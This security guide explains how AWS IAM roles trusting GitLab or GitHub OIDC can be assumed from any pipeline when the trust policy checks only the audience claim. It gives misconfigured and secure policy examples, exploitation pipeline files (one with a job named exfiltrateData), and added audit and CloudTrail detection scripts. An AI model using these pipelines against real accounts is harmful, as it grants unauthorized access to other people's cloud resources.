OpenID Connect (OIDC)

Abusing default or poorly configured Identity Provider IAM Trust Policies for privilege escalation

Last updated 4 months ago

What is OIDC?

  • OpenID Connect (OIDC) is an authentication protocol based on the OAuth 2.0 framework that eliminates the need for storing and managing passwords

  • Within AWS, an Identity Provider can be configured for OIDC ID Federation between AWS and the service

  • An IAM Role along with its Trust Policy and Permissions policy is created and tied to the Identity Provider


GitLab OIDC with AWS

  • GitLab and AWS can integrate via OIDC, allowing GitLab pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely

  • If the Role's Trust Policy is misconfigured (or otherwise poorly configured), any GitLab pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

GitLab AWS IAM Role Misconfigured Trust Policy

  • This IAM Role Trust Policy allows any connection from GitLab.com

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com"
        }
      }
    }
  ]
}

GitLab AWS IAM Role Secure Trust Policy

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com",
          "gitlab.com:sub": "project_path:Engineering/AWS-Deployments:ref_type:branch:ref:main"
        }
      }
    }
  ]
}
  • This new Trust Policy only allows requests coming from the "main" branch of the "AWS-Deployments" project in the "Engineering" GitLab Group, because the sub claim of the GitLab ID token is now matched in addition to the aud claim

GitLab Exploiting the Misconfigured Trust Policy

# .gitlab-ci.yml file 
variables:
  AWS_DEFAULT_REGION: us-east-1
  AWS_PROFILE: "oidc"

oidc:
  image:
    name: amazon/aws-cli:latest
    entrypoint: [""]
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.com
  script:
    - aws sts get-caller-identity

GitHub Actions OIDC with AWS

  • GitHub and AWS can integrate via OIDC, allowing GitHub pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely

  • If the Role's Trust Policy is misconfigured (or otherwise poorly configured), any GitHub pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

GitHub Actions AWS IAM Role Misconfigured Trust Policy

  • This IAM Role Trust Policy allows any connection from GitHub.com

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}

GitHub Actions AWS IAM Role Secure Trust Policy

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
          "token.actions.githubusercontent.com:sub": "repo:MyOrg/MyRepo:ref:refs/heads/main"
        }
      }
    }
  ]
}
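The difference between the "misconfigured" and "secure" Trust Policies in both the GitLab and GitHub sections above is the same: the misconfigured ones match only the aud claim, so any pipeline on the provider can call AssumeRoleWithWebIdentity. The following audit script is an added example (not code from the original page) that encodes that check so it can be run over a set of role trust policies. The three policy documents it uses are constructed from the page's examples; the role names and account IDs are placeholders.

```python
"""Audit IAM role trust policies for OIDC federation that is not pinned to a subject.

Added example (not from the original page): it encodes the check behind the
GitLab and GitHub 'misconfigured' vs 'secure' Trust Policies shown above.
"""
import fnmatch
from typing import Any

# Constructed trust policy documents modelled on this page's examples
# (account IDs, org/repo and group/project names are placeholders).
MISCONFIGURED_GITLAB = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringEquals": {"gitlab.com:aud": "https://gitlab.com"}},
    }],
}
SECURE_GITHUB = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringEquals": {
            "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
            "token.actions.githubusercontent.com:sub": "repo:MyOrg/MyRepo:ref:refs/heads/main",
        }},
    }],
}
BROAD_GITHUB = {  # sub is present, but the StringLike wildcard admits every repo in the org
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {
            "StringEquals": {"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"},
            "StringLike": {"token.actions.githubusercontent.com:sub": "repo:MyOrg/*"},
        },
    }],
}


def _as_list(value: Any) -> list:
    return value if isinstance(value, list) else [value]


def _condition_values(condition: dict, key: str) -> list[tuple[str, str]]:
    """(operator, value) pairs for one condition key across all operators; IAM keys are case-insensitive."""
    pairs = []
    for operator, keys in condition.items():
        for k, v in keys.items():
            if k.lower() == key.lower():
                pairs.extend((operator, str(item)) for item in _as_list(v))
    return pairs


def audit_statement(stmt: dict) -> list[str]:
    """Findings for one statement that lets an OIDC provider call AssumeRoleWithWebIdentity."""
    findings: list[str] = []
    actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
    if stmt.get("Effect") != "Allow" or not any(
        fnmatch.fnmatchcase("sts:assumerolewithwebidentity", a) for a in actions
    ):
        return findings
    principal = stmt.get("Principal", {})
    federated = _as_list(principal.get("Federated", [])) if isinstance(principal, dict) else []
    condition = stmt.get("Condition", {})
    for arn in federated:
        if ":oidc-provider/" not in arn:
            continue  # SAML or other federation is out of scope for this check
        provider = arn.split(":oidc-provider/", 1)[1]
        if not _condition_values(condition, f"{provider}:aud"):
            findings.append(f"{provider}: no aud condition, tokens minted for any audience are accepted")
        subs = _condition_values(condition, f"{provider}:sub")
        if not subs:
            findings.append(f"{provider}: no sub condition, any pipeline on the provider can assume this role")
        for operator, value in subs:
            # Only the *StringLike operators treat '*' as a wildcard. A wildcard in the
            # org/repo (GitHub) or group/project (GitLab) segment is not pinned to one project.
            parts = value.split(":")
            if operator.lower().endswith("stringlike") and (len(parts) < 2 or "*" in parts[0] or "*" in parts[1]):
                findings.append(f"{provider}: sub pattern {value!r} is not pinned to a single project/repo")
    return findings


def audit_trust_policy(policy: dict) -> list[str]:
    """All findings for one trust policy document (a decoded AssumeRolePolicyDocument)."""
    findings: list[str] = []
    for stmt in _as_list(policy.get("Statement", [])):
        findings.extend(audit_statement(stmt))
    return findings


if __name__ == "__main__":
    for name, policy in [("gitlab-misconfigured", MISCONFIGURED_GITLAB),
                         ("github-secure", SECURE_GITHUB), ("github-broad", BROAD_GITHUB)]:
        print(name, audit_trust_policy(policy) or ["OK"])
```

To run it against a real account, feed audit_trust_policy the AssumeRolePolicyDocument of each role returned by the IAM ListRoles API (boto3 already decodes that field into a dict). Whether a wildcard over a whole org or group is acceptable is a policy decision; the script only reports that the role is not pinned to one project.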

GitHub Actions Exploiting the Misconfigured Trust Policy

# .github/workflows/main.yml

name: AWS example workflow
on:
  push
env:
  AWS_REGION : "us-east-1"
# permission can be added at job level or workflow level
permissions:
  id-token: write   # This is required for requesting the JWT
  contents: read    # This is required for actions/checkout
jobs:
  exfiltrateData:
    runs-on: ubuntu-latest
    steps:
      - name: Git clone the repository
        uses: actions/checkout@v4
      - name: configure aws credentials
        uses: aws-actions/configure-aws-credentials@v4.0.2
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github # replace with IAM role to assume
          role-session-name: github-role # can be named whatever, shows in AWS logs
          aws-region: ${{ env.AWS_REGION }}

      - name:  get role identity
        run: |
          aws sts get-caller-identity
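Every successful assumption from either pipeline above lands in CloudTrail as an AssumeRoleWithWebIdentity event, and the role-session-name the workflow picks is visible there, as the comment in the workflow notes. The following detection is an added example (not from the original page) that flags sessions whose OIDC subject is not the one a role was created for. It assumes CloudTrail's WebIdentityUser record layout, where userIdentity.identityProvider names the provider and userIdentity.userName carries the token's sub claim; the events and the expected-subject allowlist are constructed, mirroring the secure Trust Policies on this page.

```python
"""Flag AssumeRoleWithWebIdentity sessions whose OIDC subject is not expected for the role.

Added example, not from the original page. Field layout follows CloudTrail's
WebIdentityUser records (identityProvider and userName under userIdentity); the
events and the allowlist below are constructed.
"""
import json
from typing import Iterable

# Constructed allowlist: the subject each role is expected to be assumed by,
# mirroring the 'secure' Trust Policies on this page (role ARNs are placeholders).
EXPECTED_SUBJECTS = {
    "arn:aws:iam::123456789012:role/github": {"repo:MyOrg/MyRepo:ref:refs/heads/main"},
    "arn:aws:iam::123456789012:role/gitlab": {
        "project_path:Engineering/AWS-Deployments:ref_type:branch:ref:main"
    },
}


def _event(provider: str, subject: str, role: str, session: str,
           event_name: str = "AssumeRoleWithWebIdentity") -> dict:
    """Build a minimal constructed CloudTrail record in the WebIdentityUser layout."""
    return {
        "eventSource": "sts.amazonaws.com",
        "eventName": event_name,
        "eventTime": "2024-05-01T10:00:00Z",
        "userIdentity": {
            "type": "WebIdentityUser",
            "identityProvider": provider,
            "userName": subject,  # the sub claim of the presented ID token
        },
        "requestParameters": {"roleArn": role, "roleSessionName": session},
    }


SAMPLE_EVENTS = [
    _event("token.actions.githubusercontent.com", "repo:MyOrg/MyRepo:ref:refs/heads/main",
           "arn:aws:iam::123456789012:role/github", "github-role"),            # expected
    _event("token.actions.githubusercontent.com", "repo:OtherOrg/OtherRepo:ref:refs/heads/main",
           "arn:aws:iam::123456789012:role/github", "github-role"),            # foreign repo
    _event("gitlab.com", "project_path:Engineering/AWS-Deployments:ref_type:branch:ref:feature",
           "arn:aws:iam::123456789012:role/gitlab", "gitlab-oidc"),            # wrong branch
    _event("gitlab.com", "project_path:Engineering/Other:ref_type:branch:ref:main",
           "arn:aws:iam::123456789012:role/unknown", "oidc"),                  # role not on file
    _event("gitlab.com", "project_path:Engineering/Other:ref_type:branch:ref:main",
           "arn:aws:iam::123456789012:role/unknown", "oidc", "GetCallerIdentity"),  # ignored
]


def unexpected_sessions(events: Iterable[dict], expected=EXPECTED_SUBJECTS) -> list[dict]:
    """Return one alert per web-identity session that does not match the allowlist."""
    alerts = []
    for ev in events:
        if ev.get("eventName") != "AssumeRoleWithWebIdentity":
            continue
        ident = ev.get("userIdentity", {})
        if ident.get("type") != "WebIdentityUser":
            continue
        params = ev.get("requestParameters", {})
        role = params.get("roleArn")
        subject = ident.get("userName")
        allowed = expected.get(role)
        if allowed is None:
            reason = "role has no expected OIDC subject on file"
        elif subject not in allowed:
            reason = "subject differs from the subject the role was created for"
        else:
            continue
        alerts.append({
            "time": ev.get("eventTime"),
            "provider": ident.get("identityProvider"),
            "subject": subject,
            "role": role,
            "session": params.get("roleSessionName"),
            "reason": reason,
        })
    return alerts


def alerts_from_jsonl(lines: Iterable[str]) -> list[dict]:
    """Same check over newline-delimited JSON records (one CloudTrail record per line)."""
    return unexpected_sessions(json.loads(line) for line in lines if line.strip())


if __name__ == "__main__":
    for alert in unexpected_sessions(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

CloudTrail log files wrap records in a top-level Records array, so when reading gzipped files from the trail bucket, pass that array to unexpected_sessions rather than using alerts_from_jsonl. The allowlist can be generated from the same trust policies the audit above inspects, so that the preventive control and the detective control agree on which subject each role is for.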

To resolve this, it's important to specify additional conditions in the IAM Role's Trust Policy, e.g. matching the sub claim as in the Secure Trust Policies above, rather than the aud claim alone.

CI/CD Variables are also needed for the GitLab pipeline to work. See my blog post for setup.